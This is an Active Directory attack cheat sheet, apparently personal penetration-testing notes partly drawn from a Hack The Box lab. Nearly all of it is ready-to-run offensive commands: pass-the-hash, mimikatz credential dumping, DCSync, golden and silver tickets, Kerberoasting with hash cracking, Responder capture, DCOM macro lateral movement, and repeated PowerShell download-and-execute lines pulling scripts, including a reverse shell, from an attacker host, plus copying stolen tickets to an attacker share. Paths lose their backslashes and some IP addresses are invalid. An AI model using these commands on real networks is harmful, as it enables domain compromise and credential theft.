Active Directory
RUNDOWN OF USEFUL TECHNIQUES
======================================================
TGT USE WITH AUTHENTICATION
└─$ kerbrute -dc-ip 10.10.1.299 -domain domain.com -user user01 -password password12345
└─$ KRB5CCNAME=user01.ccache impacket-psexec -k -no-pass domain.com/[email protected]
======================================================
CONNECTIONS VIA CRACKMAPEXEC PTH EVIL-WINRM
FIND ACCOUNT LOCKOUT ATTEMPTS IF ABLE:
PS C:Userscomputer.corp> net accounts
└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345
└─$ crackmapexec smb 10.10.1.299 -u user01 -p password12345 -M mimikatz
└─$ crackmapexec smb 10.10.1.299 -u administrator -H'ee0e207898a5beee01f38115019ee2fb' --local-auth --sam
└─$ pth-winexe -U Administrator%ee0e207898a5beee01f38115019ee2fb:ee0e207898a5beee01f38115019ee2fb //10.10.1.299 cmd
└─$ evil-winrm -u user03 -p password12345 -i 10.10.1.299
└─$ xfreerdp /u:user04 /d:domain.com /p:user04:password12345 /v:10.10.1.299
└─$ rdesktop 10.10.1.299 -u user03 -p password12345
C:tmp>.psexec.exe \dc-dc01 cmd.exe (MAYBE...)
THE PTH OPENS A SHELL ON THE DESKTOP, SO REMOTE IN TO DO THIS
mimikatz # sekurlsa::pth /user:user05_admin /domain:corp.com /ntlm:e2b475e11da2a0748290d87ee966e327 /run:PowerShell.exe
======================================================
SCRIPTS
SERVICE ACCOUNTS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')
LIST USERS
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')
LIST EVERYTHING
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')
SPECIFY A NAME BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')
POWERVIEW
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')
CHECK CREDENTIALS BY CHANGING THE SCRIPT
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/credentials_script.ps1') <-- ONLY TO VERIFY
KERBEROAST
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')
REVERSE SHELL (NISHANG)
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-PowerShellTcp.ps1')
======================================================
KERBEROAST - NEED PRIV'D ACCOUNT (LIKE ADMINISTRATOR)
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/Invoke-Kerberoast.ps1')
Invoke-Kerberoast -outputformat hashcat | fl
└─$ hashcat -m 13100 svc.hash /usr/share/wordlists/rockyou.txt
======================================================
CREATE REVERSE DNS ENTRY ON THE DC (FROM HTB INTELLIGENCE)
python3 dnstool.py -u 'intelligencetiffany.molina' -p NewIntelligenceCorpUser9876 -r webstuff.intelligence.htb -a add -t A -d 10.10.14.9 10.129.95.154
VERIFY
└─$ nslookup
> server 10.129.95.154
> webstuff.intelligence.htb
======================================================
IF YOU SEE GMSA PRIVILEGES (FROM HTB INTELLIGENCE)
└─$ python3 gMSADumper.py -u 'ted.graves' -p Mr.Teddy -d intelligence.htb
LOOKING FOR SERVICE ACCOUNT HASH DUMPS
THIS DUMPS THE HASH FOR THE SERVICE ACCOUNT
svc_int$:::16cba97b4bc423795585b0b4bcee5047
======================================================
TIME SYNC
└─$ timedatectl set-ntp false
└─$ sudo rdate -n dc.intelligence.htb
OPTIONAL: sudo ntpdate 10.129.95.154
======================================================
DC SYNC
mimikatz # lsadump::dcsync /user:Administrator
======================================================
SILVER TICKET
USING SERVICE ACCOUNT DISCOVERED USING GMSA (svc_int$)
└─$ impacket-getST -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes HASH:HASH
└─$ KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass intelligence.htb/[email protected]
======================================================
GOLDEN BUT NOT GOLDEN TICKET
C:>whoami /user (LOOKING FOR SID)
mimikatz # kerberos::purge
mimikatz # kerberos::list
mimikatz # kerberos::golden /user:user02 /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2555479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:e2b475e11da2a0748290d87ee966e327 /ptt
mimikatz # kerberos::list
READOUT TO GOLDEN: /user /domain /sid /target /service:HTTP /rc4
NOTE: CAN'T DO THIS WITH CLEAR-TEXT PASSWORD... MUST HASH FIRST
======================================================
GOLDEN TICKET
C:Toolsactive_directory> psexec.exe \dc01 cmd.exe
ACCESS DENIED WHICH CACHES THE HASH
mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
mimikatz # kerberos::purge
mimikatz # kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599470068 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt
mimikatz # misc::cmd
C:Usersuser02.crop> psexec.exe \dc01 cmd.exe
======================================================
DCOM - DISTRIBUTED COMPONENT OBJECT MODEL (LATERAL MOVEMENT)
SHOW AVAILABLE METHODS - LOOKING FOR RUN AND WORKBOOK
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$com | Get-Member
CREATE VBA MACRO (SHELL CODE GOES IN PLACE OF NOTEPAD)
Sub mymacro()
Shell ("notepad.exe")
End Sub
SCRIPT TO RUN, WILL CONNECT AND RUN THE MACRO
$Path = "\192.168.1.110c$WindowssysWOW64configsystemprofileDesktop"
$temp = [system.io.directory]::createDirectory($Path)
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
$LocalPath = "C:Usersuser05_admin.corpmyexcel.xls"
$RemotePath = "\192.168.1.110c$myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
$Path = "\192.168.1.110c$WindowssysWOW64configsystemprofileDesktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:myexcel.xls")
$com.Run("mymacro")
======================================================
SERVICE TICKET REQUEST
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets
PS C:tmp> Add-Type -AssemblyName System.IdentityModel
PS C:tmp> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/MSSQL.domain.com'
PS C:tmp> klist
THEN MIMIKATS
sekurlsa::tickets - we see the ticket for HTTP
kerberos::list /export
THEN SEND THE FILE TO ATTACK COMPUTER
PS C:tmp> copy .2-40a50000-client06$@HTTP~MSSQL.domain.com-SVCORP.COM.kirbi \192.168.119.299share
THEN CRACK
└─$ ./tgsrepcrack.py /usr/share/wordlists/rockyou.txt mssql.kirbi
CRACK WITH JOHN OR HASHCAT
kirbi2john mssql.kirbi > mssql.hash
john mssql.hash
hashcat -m 5600 user04.hash /usr/share/wordlists/rockyou.txt
======================================================
POWERVIEW
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/PowerView.ps1')
Get-NetSession -ComputerName client06 (WORKED)
Get-NetLoggedon -ComputerName client06 (WORKED)
======================================================
RESPONDER
└─$ sudo responder -I tun0
THEN REQUEST SMB FILE SHARES VIA AUTHENTICATION
PS C:tmptickets> net use \192.168.119.299share /USER:domain.comuser04
ON REMOTE DESKTOP, THIS WORKED, RESPONDER GOT THE RIGHT HASH!!!
PS C:tmptickets> net use \192.168.119.299share
MAY ASK FOR USERNAME/PASS... JUST QUIT OUT OF IT (or use domain.comuser03)
======================================================
BLOODHOUND
└─$ python3 /opt/opt/BloodHound.py/bloodhound.py -ns 10.10.1.299 -d domain.com -dc dc-dc02.domain.com -u user03 -p password12345 -c All
sudo neo4j console
BLOUDHOUND GUI - CHANGE PASSWORD http://localhost:7474
bloodhound
IMPORT THE JSON FILES
======================================================
SMB FILE MOVEMENT
AUTHENTICATE: PS C:tmptickets> net use \192.168.119.299share student /USER:student
MOVE FILES: PS C:tmptickets> copy .FILE.kirbi \192.168.119.299share
TO STOP THE SHARE: net use \192.168.119.299share /DELETE
======================================================
AD SCRIPT REFERENCE
ALL ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/all_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
Foreach($prop in $obj.Properties)
{
$prop
}
Write-Host "------------------------"
}
AD SCRIPT REFERENCE
SERVICE ACCOUNTS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/svc_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
Foreach($prop in $obj.Properties)
{
$prop
}
}
AD SCRIPT REFERENCE
LIST USERS
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/users_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Searcher.FindAll()
AD SCRIPT REFERENCE
CHANGE SCRIPT TO GET A CERTAIN NAME
-------------------
IEX(New-Object Net.webclient).downloadString('http://192.168.119.299:443/specific_name_script.ps1')
-------------------
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="name=Domain Admins"
$Searcher.FindAll()